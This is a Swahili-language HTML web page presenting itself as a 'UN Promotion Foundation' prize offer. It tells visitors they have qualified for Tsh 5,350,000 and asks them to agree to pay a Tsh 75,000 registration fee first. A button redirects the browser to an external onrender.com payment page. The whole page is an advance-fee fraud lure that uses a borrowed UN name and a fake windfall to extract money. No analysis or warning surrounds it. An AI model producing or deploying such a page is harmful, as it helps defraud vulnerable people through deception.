<!DOCTYPE html>
<html>

<head>
    <title>UN PROMOTION FOUNDATION - Ofa Iliyoidhinishwa</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
        }

        h1,
        h2,
        h3 {
            margin-bottom: 20px;
        }

        p {
            font-size: 1.2em;
            line-height: 1.5;
        }

        button {
            background-color: #4CAF50;
            /* Green */
            border: none;
            color: white;
            padding: 15px 32px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 16px;
            margin: 4px 2px;
            cursor: pointer;
        }

        button:hover {
            background-color: #3e8e41;
            /* Darker green */
        }
    </style>
</head>

<body>
    <h1>MAMBO MAKUU... <br>
        PONGEZI </h1>
    <h2>Una ofa Iliyohitimu Tsh.5,350,000</h2>
    <h3>Uko karibu hapo!</h3>
    <p>Kama ukaguzi wa mwisho wa uthibitishaji, tafadhali jibu kwa neno (NDIYO niko tayari) ikiwa uko tayari kulipa ada
        ya
        usajili ya Tsh.75,000 Kisha tuendelee na usajili</p>
    <button onclick="redirect()">Tayari kulipa ada ya usajili</button><br>
    <button onclick="unredirect()">Siko tayari(Nachagua kuondoka)</button>
    <script>
    function redirect(){
    window.parent.location.href = "https://page5.onrender.com/";
    }
    </script>
      <script>
    function unredirect(){
    window.parent.location.href = "https://homepage-l9av.onrender.com/";
    }
    </script>
</body>

</html>
